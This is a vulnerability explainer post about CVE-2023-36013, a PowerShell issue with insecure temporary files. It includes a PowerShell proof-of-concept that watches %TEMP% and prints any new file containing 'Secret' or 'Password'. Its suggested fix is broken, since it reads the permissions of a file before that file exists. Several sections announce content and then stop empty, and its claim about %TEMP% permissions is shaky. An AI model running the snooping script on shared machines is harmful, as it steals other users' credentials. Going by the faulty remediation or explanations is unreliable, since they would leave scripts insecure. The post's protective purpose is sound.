CVE CyberSecurity Database News

CVE-2023-36013 - Deep Dive Into a PowerShell Information Disclosure Vulnerability

Poster -

In late 2023, Microsoft addressed a concerning PowerShell issue tracked as CVE-2023-36013. If you use PowerShell frequently—for automation, scripting, system administration, or pen testing—you should be aware of this vulnerability. Let's explore how it works, what’s at risk, and how you can protect your systems. We'll show code, explain exploitation, and give direct references.

What Is CVE-2023-36013?

CVE-2023-36013 is an information disclosure vulnerability affecting PowerShell on Windows. Specifically, it allows attackers to read files and access information they shouldn't be able to, under certain circumstances.

According to Microsoft:
> "*An information disclosure vulnerability exists when PowerShell improperly handles file operations. An attacker who successfully exploited the vulnerability could gain access to sensitive information.*“

Read the official Microsoft post here:
- Microsoft Security Guide for CVE-2023-36013

Affected PowerShell: PowerShell 7 (various versions), Windows PowerShell 5.1

Note: The attacker needs some level of local access (not just remote).

How Does the Exploit Work?

The vulnerability comes down to the way PowerShell handles file operations, particularly *temporary files* created with weak permissions. If a script or cmdlet creates a file in a predictable location (like %TEMP% or %APPDATA%) and with world-readable permissions, a local attacker or another user on the system could access its contents.

Imagine a user running a sensitive script that extracts a password into a temporary file

# Create a temp file with sensitive content
$tempPath = "$env:TEMP\secret.txt"
$password = "SuperSecretPassword!"

# Write password to file (this is insecure)
Set-Content -Path $tempPath -Value $password

# Do something with the password...

# Remove the file
Remove-Item $tempPath

In this straightforward example:

Any malicious local user monitoring the folder can read secret.txt before it’s deleted.

Why is this possible? Because default permissions may allow "Everyone" or "Authenticated Users" to read files in %TEMP%.
In Windows, %TEMP% is not always fully private.

Here is a *proof-of-concept exploit* in PowerShell

# Attacker script - monitors for new files in temp

$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = $env:TEMP
$watcher.EnableRaisingEvents = $true

Register-ObjectEvent $watcher 'Created' -Action {
    $file = $Event.SourceEventArgs.FullPath
    Try {
        Start-Sleep -Milliseconds 100    # Wait for write
        $content = Get-Content -Path $file -ErrorAction SilentlyContinue
        if ($content -and ($content -match "Secret|Password")) {
            Write-Host "Snooped file: $file`n$content"
        }
    } Catch {}
}

# Let the watcher run for 3 minutes
Start-Sleep 180

What this script does:

Why Is This a Vulnerability?

Many scripts and tools use PowerShell's file commands (Set-Content, Out-File, etc.) without specifying secure permissions. By default, Windows may NOT lock down temp folder files.

Malicious users sharing the same machine can “race” to read these files. If the file contains API keys, passwords, or sensitive config, it’s silently leaked.

First, update PowerShell to the latest released version

- PowerShell Releases - GitHub

Do Not Store Sensitive Data in Temp Files

Where possible, avoid writing passwords or secrets to disk. If you must, use secure locations and wipe immediately after use.

Example: Create file with user-only permissions

$tempPath = "$env:TEMP\secret.txt"

# Create file with strict permissions
$acl = Get-Acl $tempPath
$person = [System.Security.Principal.NTAccount]"$env:USERNAME"
$accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule($person, "FullControl", "Allow")
$acl.SetOwner($person)
$acl.SetAccessRule($accessRule)
Set-Acl $tempPath $acl

# Now write to file
Set-Content -Path $tempPath -Value $password

Microsoft’s Guidance

Microsoft’s official workaround advises:

Conclusion

CVE-2023-36013 isn’t flashy, but it’s a classic low-hanging fruit for attackers who have local access. Reviewing scripts and being careful with temporary files is critical.

TL;DR:

Watch those permissions!

Useful References:
- Microsoft CVE Advisory
- PowerShell on GitHub
- Detailed community discussion

Stay safe, keep your scripts tight, and never trust your temp folder!

Timeline

Published on: 11/20/2023 16:15:08 UTC
Last modified on: 12/01/2023 17:55:52 UTC